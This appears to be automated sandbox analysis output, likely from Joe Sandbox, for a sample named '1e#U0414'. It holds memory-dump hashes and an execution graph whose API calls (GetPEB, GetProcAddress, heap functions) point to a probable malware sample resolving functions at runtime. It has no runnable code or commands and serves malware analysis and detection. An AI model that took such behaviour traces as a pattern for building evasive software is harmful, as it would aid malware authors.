                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4e66989ad3eb1a54306037b693129ccb96b30b3423d1aa2bb74dffb798d27bbc
                    • Instruction ID: b428981be826055572eb108f31b5732291a52b84e69cfa70c5426c3112946279
                    • Opcode Fuzzy Hash: 4e66989ad3eb1a54306037b693129ccb96b30b3423d1aa2bb74dffb798d27bbc
                    • Instruction Fuzzy Hash: B52103B5E042498FCF01CFA8D840AEEBBF1FB49320F1490AAE814B7351D7359A50CB65
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 299ed9eaa787a572de32255036fde4ebc649e1d2aa853014c66a9077b58538f9
                    • Instruction ID: 7e7bbf824c52c9649cd1949c1aeb34f50844ba8bcfeb925db3b89149a4a6ff21
                    • Opcode Fuzzy Hash: 299ed9eaa787a572de32255036fde4ebc649e1d2aa853014c66a9077b58538f9
                    • Instruction Fuzzy Hash: 0D118DB5E0021A9FCF15CFA9D8409EEBBF1BB49310F10942AE914B3350D7319A50DFA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b917fdf09029599534836507fcf53b74fdeeeb965ad0f9be13e34f6d03cdf263
                    • Instruction ID: 8a0b67658046e7ccefc6929999d04051fdd0caa31a3fcbcc2c0ad98f506595f6
                    • Opcode Fuzzy Hash: b917fdf09029599534836507fcf53b74fdeeeb965ad0f9be13e34f6d03cdf263
                    • Instruction Fuzzy Hash: 93F0C772D082849FCB42CFA8D8522C8BFB0EB06320F0881EBD814C3321D7388A86DB50
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: daa967c9f5d070d03dd8052348cca592d0234835da7d9a8e222822bfc8615507
                    • Instruction ID: b17ac4957605cb54e26915ae8a9baea645c097f77ab2e883972227f3ec0771d5
                    • Opcode Fuzzy Hash: daa967c9f5d070d03dd8052348cca592d0234835da7d9a8e222822bfc8615507
                    • Instruction Fuzzy Hash: A7018C35A483449FCB41CFA8D484A9CBFF0EF49320F1580EBE844D7262C6348A84DB01
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8e406440daac56e36933c8b4334e85667fea6661f3787e7fe63d4b85884962e
                    • Instruction ID: e9c320ff30dc40c620c27ed88c10bbb3f6d8d5958094c75f3ee95a3901aafe34
                    • Opcode Fuzzy Hash: f8e406440daac56e36933c8b4334e85667fea6661f3787e7fe63d4b85884962e
                    • Instruction Fuzzy Hash: F1F01D7594E3859FC742CFB8D8555987FB0AF07220B1A41EBD444CB6B3D6384E45CB11
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f95fd301923d7b133076406962fd98a21275d107a1c5613707f8c2561e52ec5
                    • Instruction ID: 7a817fb141866fa9419ce0d821335e558b48719688bde50d16623eb899481ec5
                    • Opcode Fuzzy Hash: 3f95fd301923d7b133076406962fd98a21275d107a1c5613707f8c2561e52ec5
                    • Instruction Fuzzy Hash: F9F05E71A49344DFC706CBA4E8246AD7BF0EB46260B2A85EBD004DB5A2DB798E45C711
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8752ff12ee53f9243b2e2e81fb749327ba31cf3238ee35e23feb4320008bb4dd
                    • Instruction ID: 9b56fa9ce52118e8e45e70e226b68885bd96817ed9104b53c429b61c6dc1b18c
                    • Opcode Fuzzy Hash: 8752ff12ee53f9243b2e2e81fb749327ba31cf3238ee35e23feb4320008bb4dd
                    • Instruction Fuzzy Hash: 25F06734D08308AFCB51CFA8A945ADCBFB0EB45320F1080EBD800A7221D7380A85DB81
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 071f2a686c1ae43c3001c9d4071f77969307995b4e57c5cec1bd84e743909bf8
                    • Instruction ID: 1645193e686d6a6988a8736b7bd54772843e594054e72d9f18190f90237489bf
                    • Opcode Fuzzy Hash: 071f2a686c1ae43c3001c9d4071f77969307995b4e57c5cec1bd84e743909bf8
                    • Instruction Fuzzy Hash: ADF0A578A00208EFCB40DFA8D545A9DBBF0FB48310F10C1A9E81897320D7319A50DB41
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fd0304c0b05383701aa7f308a405299b0a119dd3ea41d9b5d9bdb719b3fa6df5
                    • Instruction ID: 8bdd97d311eee405f56073ef175a9c460c2295756aebeac0e3a02ee1b88877ce
                    • Opcode Fuzzy Hash: fd0304c0b05383701aa7f308a405299b0a119dd3ea41d9b5d9bdb719b3fa6df5
                    • Instruction Fuzzy Hash: BBE0C970D01309DFCB64DFA895406DDBBF0AF45315F2081BED414A6324D7354A91DB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cfe325e3ce0d86bd0b177c4e5d547b30ab6af260c854f56f68d77126d7be39e2
                    • Instruction ID: be9fd363d55898fd6512867dfa127026b69314795a04949e59820fd2115984d7
                    • Opcode Fuzzy Hash: cfe325e3ce0d86bd0b177c4e5d547b30ab6af260c854f56f68d77126d7be39e2
                    • Instruction Fuzzy Hash: 15E01A74E00208EFCB54DFA8D505A9DBBB4EB44300F10C1AAE814A3314D7355A90DF80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d649d25b0a16337a7244f9cd3310e03c98725b52b2e2eb8fef2880b77c14480b
                    • Instruction ID: 8f0b1efeb80058f306cc58087ff3cf5db9fdc038ca2bb8b330aa16d48c9731da
                    • Opcode Fuzzy Hash: d649d25b0a16337a7244f9cd3310e03c98725b52b2e2eb8fef2880b77c14480b
                    • Instruction Fuzzy Hash: 3CE04674E01308EFCB54DFF8A5002ADBBF0AB45301F2081E9D818A3350DB348B80EB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2930fe65d31ce55cfab0c3a5e4a0d80c422de2a03abf86b0784fade69d98d224
                    • Instruction ID: 499dc17ffd9424c33c49f512ce699cd3b5d4716302c688349e0d209d80880396
                    • Opcode Fuzzy Hash: 2930fe65d31ce55cfab0c3a5e4a0d80c422de2a03abf86b0784fade69d98d224
                    • Instruction Fuzzy Hash: 1BE09A78E0020DEFCB54DFA8D545A9DFBB4AB44310F10C5A9A814A3354DB345A54DF95
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 652dd735a2d3c46edbc9c3a64bd3936b5783b4a1b353c87f0e5dbfa2a11ef792
                    • Instruction ID: 8d80f30c0f1e04682509da8cf3bc4465adc14144c3671494e7d2957d60aff8ef
                    • Opcode Fuzzy Hash: 652dd735a2d3c46edbc9c3a64bd3936b5783b4a1b353c87f0e5dbfa2a11ef792
                    • Instruction Fuzzy Hash: ABE0B678A11208DFC750DFA8D545A9DBFF4AB08311F5441A9E90497360EB309A50DB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750266188.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3250000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6b6da0a94cd0b5a03a6fa9e4f83b926d7352d45b10aa5da2df66565f46c50204
                    • Instruction ID: e2634cb29369909b57f1a4e46304d1ed31520826b15ee4e7849fc5739ecedf11
                    • Opcode Fuzzy Hash: 6b6da0a94cd0b5a03a6fa9e4f83b926d7352d45b10aa5da2df66565f46c50204
                    • Instruction Fuzzy Hash: 5AD01274A01209EBC700DFF9E50465DBBF8FB08350F1440A9A40493250DB715F50DB51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID: poq
                    • API String ID: 0-1570044193
                    • Opcode ID: 27d4a1e34f8ca0071e9d5d1d2b2a08b34ac4a8845956b685e1787386f3c31d48
                    • Instruction ID: 96552bd29c66644ec7b351d7a5d54ea2a9c1b05d7d387087029ec1d77c022b53
                    • Opcode Fuzzy Hash: 27d4a1e34f8ca0071e9d5d1d2b2a08b34ac4a8845956b685e1787386f3c31d48
                    • Instruction Fuzzy Hash: 3802D275A00218DFDB15CFA9C984E9DBBB2FF49304F1581A9E509AB232D732E991DF40
                    Memory Dump Source
                    • Source File: 00000000.00000002.1750203601.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3220000_1e#U0414.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b37fe4ee3458be5bce1ee38e056e5e2f095d9660acc9bd7b9f661b0ec853d6b2
                    • Instruction ID: e30f634b61c8dbec18e1e7abc7cde7a0218a75d8be71fe3b4b65eb016b94eca1
                    • Opcode Fuzzy Hash: b37fe4ee3458be5bce1ee38e056e5e2f095d9660acc9bd7b9f661b0ec853d6b2
                    • Instruction Fuzzy Hash: 0851C675E10619DBDB18CFAAD940ADDFBF6BF89300F14C16AD509AB264DB30A991CF40

                    Execution Graph

                    Execution Coverage:30.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.4%
                    Total number of Nodes:1846
                    Total number of Limit Nodes:93
                    execution_graph 9723 40c640 9750 404bee 9723->9750 9726 40c70f 9727 404bee 6 API calls 9728 40c66b 9727->9728 9729 40c708 9728->9729 9731 404bee 6 API calls 9728->9731 9730 402bab 2 API calls 9729->9730 9730->9726 9732 40c683 9731->9732 9733 40c701 9732->9733 9734 404bee 6 API calls 9732->9734 9735 402bab 2 API calls 9733->9735 9738 40c694 9734->9738 9735->9729 9736 40c6f8 9737 402bab 2 API calls 9736->9737 9737->9733 9738->9736 9757 40c522 9738->9757 9740 40c6a9 9741 40c6ef 9740->9741 9743 405872 4 API calls 9740->9743 9742 402bab 2 API calls 9741->9742 9742->9736 9744 40c6c5 9743->9744 9745 405872 4 API calls 9744->9745 9746 40c6d5 9745->9746 9747 405872 4 API calls 9746->9747 9748 40c6e7 9747->9748 9749 402bab 2 API calls 9748->9749 9749->9741 9751 402b7c 2 API calls 9750->9751 9753 404bff 9751->9753 9752 404c3b 9752->9726 9752->9727 9753->9752 9754 4031e5 4 API calls 9753->9754 9755 404c28 9754->9755 9755->9752 9756 402bab 2 API calls 9755->9756 9756->9752 9758 402b7c 2 API calls 9757->9758 9759 40c542 9758->9759 9759->9740 9760 405941 9761 4031e5 4 API calls 9760->9761 9762 405954 9761->9762 8327 409046 8340 413b28 8327->8340 8329 40906d 8331 405b6f 6 API calls 8329->8331 8330 40904e 8330->8329 8332 403fbf 7 API calls 8330->8332 8333 40907c 8331->8333 8332->8329 8334 409092 8333->8334 8344 409408 8333->8344 8336 4090a3 8334->8336 8339 402bab 2 API calls 8334->8339 8338 402bab 2 API calls 8338->8334 8339->8336 8341 413b31 8340->8341 8342 413b38 8340->8342 8343 404056 6 API calls 8341->8343 8342->8330 8343->8342 8345 409413 8344->8345 8346 40908c 8345->8346 8358 409d36 8345->8358 8346->8338 8357 40945c 8464 40a35d 8357->8464 8359 409d43 8358->8359 8360 40a35d 4 API calls 8359->8360 8361 409d55 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409d8b 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409dd0 8364->8365 8366 405b6f 6 API calls 8365->8366 8397 409423 8365->8397 8368 409df7 8366->8368 8367 409e1c 8369 4031e5 4 API calls 8367->8369 8367->8397 8368->8367 8371 402bab 2 API calls 8368->8371 8370 409e62 8369->8370 8372 4031e5 4 API calls 8370->8372 8371->8367 8373 409e82 8372->8373 8374 4031e5 4 API calls 8373->8374 8375 409ea2 8374->8375 8376 4031e5 4 API calls 8375->8376 8377 409ec2 8376->8377 8378 4031e5 4 API calls 8377->8378 8379 409ee2 8378->8379 8380 4031e5 4 API calls 8379->8380 8381 409f02 8380->8381 8382 4031e5 4 API calls 8381->8382 8383 409f22 8382->8383 8384 4031e5 4 API calls 8383->8384 8387 409f42 8384->8387 8385 40a19b 8386 408b2c 4 API calls 8385->8386 8386->8397 8387->8385 8388 409fa3 8387->8388 8389 405b6f 6 API calls 8388->8389 8388->8397 8390 409fbd 8389->8390 8391 40a02c 8390->8391 8392 402bab 2 API calls 8390->8392 8393 4031e5 4 API calls 8391->8393 8419 40a16d 8391->8419 8396 409fd7 8392->8396 8394 40a070 8393->8394 8399 4031e5 4 API calls 8394->8399 8395 402bab 2 API calls 8395->8397 8398 405b6f 6 API calls 8396->8398 8397->8357 8420 4056bf 8397->8420 8401 409fe5 8398->8401 8400 40a090 8399->8400 8403 4031e5 4 API calls 8400->8403 8401->8391 8402 402bab 2 API calls 8401->8402 8404 409fff 8402->8404 8405 40a0b0 8403->8405 8406 405b6f 6 API calls 8404->8406 8408 4031e5 4 API calls 8405->8408 8407 40a00d 8406->8407 8407->8391 8410 40a021 8407->8410 8409 40a0d0 8408->8409 8412 4031e5 4 API calls 8409->8412 8411 402bab 2 API calls 8410->8411 8411->8397 8413 40a0f0 8412->8413 8414 4031e5 4 API calls 8413->8414 8415 40a110 8414->8415 8416 40a134 8415->8416 8417 4031e5 4 API calls 8415->8417 8416->8419 8474 408b2c 8416->8474 8417->8416 8419->8395 8419->8397 8421 402b7c 2 API calls 8420->8421 8423 4056cd 8421->8423 8422 4056d4 8425 408c4d 8422->8425 8423->8422 8424 402b7c 2 API calls 8423->8424 8424->8422 8426 413ba4 6 API calls 8425->8426 8427 408c5c 8426->8427 8428 408f02 8427->8428 8429 408f3a 8427->8429 8432 40903e 8427->8432 8431 405b6f 6 API calls 8428->8431 8430 405b6f 6 API calls 8429->8430 8446 408f51 8430->8446 8433 408f0c 8431->8433 8448 413aca 8432->8448 8433->8432 8437 408f31 8433->8437 8477 40a1b6 8433->8477 8435 405b6f 6 API calls 8435->8446 8436 402bab 2 API calls 8436->8432 8437->8436 8439 409031 8440 402bab 2 API calls 8439->8440 8440->8437 8441 409022 8442 402bab 2 API calls 8441->8442 8443 409028 8442->8443 8444 402bab 2 API calls 8443->8444 8444->8437 8445 402bab GetProcessHeap HeapFree 8445->8446 8446->8432 8446->8435 8446->8437 8446->8439 8446->8441 8446->8445 8447 40a1b6 14 API calls 8446->8447 8511 4044ee 8446->8511 8447->8446 8449 413ad7 8448->8449 8457 409451 8448->8457 8450 405781 4 API calls 8449->8450 8451 413af0 8450->8451 8452 405781 4 API calls 8451->8452 8453 413afe 8452->8453 8454 405762 4 API calls 8453->8454 8455 413b0e 8454->8455 8456 405781 4 API calls 8455->8456 8455->8457 8456->8457 8458 405695 8457->8458 8459 4056a0 8458->8459 8463 4056b9 8458->8463 8460 402bab 2 API calls 8459->8460 8461 4056b3 8460->8461 8462 402bab 2 API calls 8461->8462 8462->8463 8463->8357 8465 40a368 8464->8465 8466 40a39a 8464->8466 8470 4031e5 4 API calls 8465->8470 8467 40a3af 8466->8467 8468 4031e5 4 API calls 8466->8468 8469 40a3ca 8467->8469 8471 408b2c 4 API calls 8467->8471 8468->8467 8472 408b2c 4 API calls 8469->8472 8473 40a38a 8469->8473 8470->8473 8471->8469 8472->8473 8473->8346 8475 4031e5 4 API calls 8474->8475 8476 408b3e 8475->8476 8476->8419 8478 40a202 8477->8478 8479 40a1c3 8477->8479 8633 405f08 8478->8633 8480 405b6f 6 API calls 8479->8480 8483 40a1d0 8480->8483 8482 40a1fc 8482->8437 8483->8482 8485 40a1f3 8483->8485 8521 40a45b 8483->8521 8488 402bab 2 API calls 8485->8488 8486 402bab 2 API calls 8486->8482 8488->8482 8489 405b6f 6 API calls 8491 40a245 8489->8491 8490 40a25d 8492 405b6f 6 API calls 8490->8492 8491->8490 8493 413a58 13 API calls 8491->8493 8498 40a26b 8492->8498 8495 40a257 8493->8495 8494 40a28b 8496 405b6f 6 API calls 8494->8496 8497 402bab 2 API calls 8495->8497 8499 40a297 8496->8499 8497->8490 8498->8494 8500 40a284 8498->8500 8640 40955b 8498->8640 8504 40a2b0 8499->8504 8508 40a2b7 8499->8508 8647 40968e 8499->8647 8502 402bab 2 API calls 8500->8502 8502->8494 8503 405b6f 6 API calls 8503->8508 8506 402bab 2 API calls 8504->8506 8506->8508 8507 40a333 8507->8486 8508->8503 8508->8507 8509 402bab 2 API calls 8508->8509 8657 4098a7 8508->8657 8509->8508 8512 402b7c 2 API calls 8511->8512 8513 404512 8512->8513 8515 404585 GetLastError 8513->8515 8517 402bab 2 API calls 8513->8517 8519 40457c 8513->8519 8520 402b7c 2 API calls 8513->8520 8912 4044a7 8513->8912 8516 404592 8515->8516 8515->8519 8518 402bab 2 API calls 8516->8518 8517->8513 8518->8519 8519->8446 8520->8513 8666 40642c 8521->8666 8523 40a469 8524 40c4ff 8523->8524 8669 4047e6 8523->8669 8524->8485 8527 4040bb 12 API calls 8528 40bf88 8527->8528 8528->8524 8529 403c90 8 API calls 8528->8529 8530 40bfaa 8529->8530 8531 402b7c 2 API calls 8530->8531 8533 40bfc1 8531->8533 8532 40c4f3 8534 403f9e 5 API calls 8532->8534 8535 40c3aa 8533->8535 8676 40a423 8533->8676 8534->8524 8535->8532 8538 4056bf 2 API calls 8535->8538 8541 40c4e3 8535->8541 8536 402bab 2 API calls 8536->8532 8540 40c3d2 8538->8540 8540->8541 8543 4040bb 12 API calls 8540->8543 8541->8536 8542 405f08 4 API calls 8544 40c005 8542->8544 8545 40c3f3 8543->8545 8546 40c021 8544->8546 8679 40a43f 8544->8679 8548 40c4d1 8545->8548 8736 405a52 8545->8736 8547 4031e5 4 API calls 8546->8547 8550 40c034 8547->8550 8553 413aca 4 API calls 8548->8553 8559 4031e5 4 API calls 8550->8559 8554 40c4dd 8553->8554 8557 405695 2 API calls 8554->8557 8555 40c411 8741 405a87 8555->8741 8556 402bab 2 API calls 8556->8546 8557->8541 8565 40c04d 8559->8565 8560 40c4b3 8561 402bab 2 API calls 8560->8561 8563 40c4cb 8561->8563 8562 405a52 4 API calls 8573 40c423 8562->8573 8564 403f9e 5 API calls 8563->8564 8564->8548 8567 4031e5 4 API calls 8565->8567 8566 405a87 4 API calls 8566->8573 8568 40c085 8567->8568 8570 4031e5 4 API calls 8568->8570 8569 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8569->8573 8571 40c09c 8570->8571 8574 4031e5 4 API calls 8571->8574 8572 402bab 2 API calls 8572->8573 8573->8560 8573->8562 8573->8566 8573->8569 8573->8572 8575 40c0b3 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c0ca 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c0e7 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c100 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c119 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c132 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c14b 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c164 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c17d 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c196 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c1af 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c1c8 8596->8597 8598 4031e5 4 API calls 8597->8598 8599 40c1de 8598->8599 8600 4031e5 4 API calls 8599->8600 8601 40c1f4 8600->8601 8602 4031e5 4 API calls 8601->8602 8603 40c20d 8602->8603 8604 4031e5 4 API calls 8603->8604 8605 40c226 8604->8605 8606 4031e5 4 API calls 8605->8606 8607 40c23f 8606->8607 8608 4031e5 4 API calls 8607->8608 8609 40c258 8608->8609 8610 4031e5 4 API calls 8609->8610 8611 40c273 8610->8611 8612 4031e5 4 API calls 8611->8612 8613 40c28a 8612->8613 8614 4031e5 4 API calls 8613->8614 8617 40c2d5 8614->8617 8615 40c3a2 8616 402bab 2 API calls 8615->8616 8616->8535 8617->8615 8618 4031e5 4 API calls 8617->8618 8619 40c315 8618->8619 8620 40c38b 8619->8620 8682 404866 8619->8682 8621 403c40 5 API calls 8620->8621 8623 40c397 8621->8623 8625 403c40 5 API calls 8623->8625 8625->8615 8626 40c382 8628 403c40 5 API calls 8626->8628 8628->8620 8630 406c4c 6 API calls 8631 40c355 8630->8631 8631->8626 8706 4126a7 8631->8706 8634 4031e5 4 API calls 8633->8634 8635 405f1d 8634->8635 8636 405f55 8635->8636 8637 402b7c 2 API calls 8635->8637 8636->8482 8636->8489 8636->8490 8636->8507 8638 405f36 8637->8638 8638->8636 8639 4031e5 4 API calls 8638->8639 8639->8636 8641 409673 8640->8641 8646 40956d 8640->8646 8641->8500 8642 408b45 6 API calls 8642->8646 8643 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8643->8646 8644 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8644->8646 8645 402bab GetProcessHeap HeapFree 8645->8646 8646->8641 8646->8642 8646->8643 8646->8644 8646->8645 8648 4040bb 12 API calls 8647->8648 8652 4096a9 8648->8652 8649 40989f 8649->8504 8650 409896 8651 403f9e 5 API calls 8650->8651 8651->8649 8652->8649 8652->8650 8654 408b45 6 API calls 8652->8654 8655 402bab GetProcessHeap HeapFree 8652->8655 8656 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8652->8656 8905 4059d8 8652->8905 8654->8652 8655->8652 8656->8652 8658 4040bb 12 API calls 8657->8658 8664 4098c1 8658->8664 8659 4099fb 8659->8508 8660 4099f3 8661 403f9e 5 API calls 8660->8661 8661->8659 8662 4059d8 4 API calls 8662->8664 8663 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8663->8664 8664->8659 8664->8660 8664->8662 8664->8663 8665 402bab GetProcessHeap HeapFree 8664->8665 8665->8664 8667 4031e5 4 API calls 8666->8667 8668 406441 GetNativeSystemInfo 8667->8668 8668->8523 8670 4031e5 4 API calls 8669->8670 8672 40480a 8670->8672 8671 4031e5 4 API calls 8671->8672 8672->8671 8674 40484f 8672->8674 8675 40485d 8672->8675 8673 403c40 5 API calls 8673->8675 8674->8673 8675->8524 8675->8527 8677 4031e5 4 API calls 8676->8677 8678 40a435 8677->8678 8678->8542 8680 4031e5 4 API calls 8679->8680 8681 40a451 8680->8681 8681->8556 8683 4031e5 4 API calls 8682->8683 8684 40487c 8683->8684 8684->8626 8685 406c4c 8684->8685 8746 4068eb 8685->8746 8687 406e02 8687->8630 8688 406cab 8758 40469b 8688->8758 8689 406c6c 8689->8687 8689->8688 8755 406894 8689->8755 8696 406df1 8697 40469b 4 API calls 8696->8697 8697->8687 8698 406cef 8698->8696 8699 4031e5 4 API calls 8698->8699 8700 406d26 8699->8700 8700->8696 8701 40771e 6 API calls 8700->8701 8705 406d57 8701->8705 8702 406da2 8703 4031e5 4 API calls 8702->8703 8703->8696 8705->8702 8771 4068b0 8705->8771 8707 4126bb 8706->8707 8708 4126d1 8706->8708 8709 412840 8707->8709 8827 40488c 8707->8827 8708->8709 8833 407055 8708->8833 8709->8626 8713 412837 8714 403c40 5 API calls 8713->8714 8714->8709 8717 41281e 8718 4070ff 6 API calls 8717->8718 8718->8713 8719 407055 6 API calls 8720 412742 8719->8720 8720->8717 8721 40719a 6 API calls 8720->8721 8722 41276e 8721->8722 8735 412804 8722->8735 8849 406f4a 8722->8849 8725 41279a 8855 412553 8725->8855 8877 4070ff 8735->8877 8899 405907 8736->8899 8738 405a61 8739 405a76 8738->8739 8740 405907 4 API calls 8738->8740 8739->8555 8740->8738 8742 402b7c 2 API calls 8741->8742 8745 405a99 8742->8745 8743 405ade 8743->8573 8745->8743 8902 40595e 8745->8902 8774 4076a8 8746->8774 8748 406913 8749 406a61 8748->8749 8750 40771e 6 API calls 8748->8750 8749->8689 8754 406949 8750->8754 8751 40771e 6 API calls 8751->8754 8753 404678 4 API calls 8753->8754 8754->8749 8754->8751 8754->8753 8780 4046c2 8754->8780 8756 4031e5 4 API calls 8755->8756 8757 4068a6 8756->8757 8757->8689 8759 4046b4 8758->8759 8760 4046a4 8758->8760 8759->8687 8762 404678 8759->8762 8761 4031e5 4 API calls 8760->8761 8761->8759 8763 4031e5 4 API calls 8762->8763 8764 40468b 8763->8764 8764->8687 8765 40771e 8764->8765 8766 407737 8765->8766 8770 407748 8765->8770 8767 407644 6 API calls 8766->8767 8768 407741 8767->8768 8769 406baa 6 API calls 8768->8769 8769->8770 8770->8698 8772 4031e5 4 API calls 8771->8772 8773 4068c2 8772->8773 8773->8705 8775 4076c1 8774->8775 8779 4076d2 8774->8779 8788 407644 8775->8788 8779->8748 8781 4046d3 8780->8781 8782 4046d9 8780->8782 8823 40464c 8781->8823 8784 4046e9 8782->8784 8786 404678 4 API calls 8782->8786 8785 404714 8784->8785 8787 40469b 4 API calls 8784->8787 8785->8754 8786->8784 8787->8785 8789 407653 8788->8789 8790 407661 8788->8790 8789->8790 8796 406a6b 8789->8796 8792 406baa 8790->8792 8793 406bbb 8792->8793 8795 406bc8 8792->8795 8793->8795 8804 407402 8793->8804 8795->8779 8800 406a81 8796->8800 8797 402b7c 2 API calls 8797->8800 8798 406b8b 8798->8790 8799 406894 4 API calls 8799->8800 8800->8797 8800->8798 8800->8799 8801 406b96 8800->8801 8802 402bab 2 API calls 8800->8802 8803 402bab 2 API calls 8801->8803 8802->8800 8803->8798 8805 407644 6 API calls 8804->8805 8806 407412 8805->8806 8807 402b7c 2 API calls 8806->8807 8814 407450 8806->8814 8808 407483 8807->8808 8809 402b7c 2 API calls 8808->8809 8808->8814 8812 4074ce 8809->8812 8810 4074da 8811 4068cc 2 API calls 8810->8811 8811->8814 8812->8810 8813 402b7c 2 API calls 8812->8813 8817 40751f 8813->8817 8814->8795 8815 40752b 8816 4068cc 2 API calls 8815->8816 8816->8810 8817->8815 8819 4068cc 8817->8819 8820 4068d6 8819->8820 8821 4068e3 8819->8821 8820->8821 8822 402bab GetProcessHeap HeapFree 8820->8822 8821->8815 8822->8821 8824 404666 8823->8824 8825 404659 8823->8825 8824->8782 8826 4031e5 4 API calls 8825->8826 8826->8824 8828 4047e6 5 API calls 8827->8828 8829 404897 8828->8829 8830 40489c 8829->8830 8885 4047c7 8829->8885 8830->8708 8834 40706f 8833->8834 8835 407084 8833->8835 8834->8835 8836 407644 6 API calls 8834->8836 8840 4070e4 8835->8840 8888 406fd2 8835->8888 8837 40707d 8836->8837 8839 406baa 6 API calls 8837->8839 8839->8835 8840->8713 8841 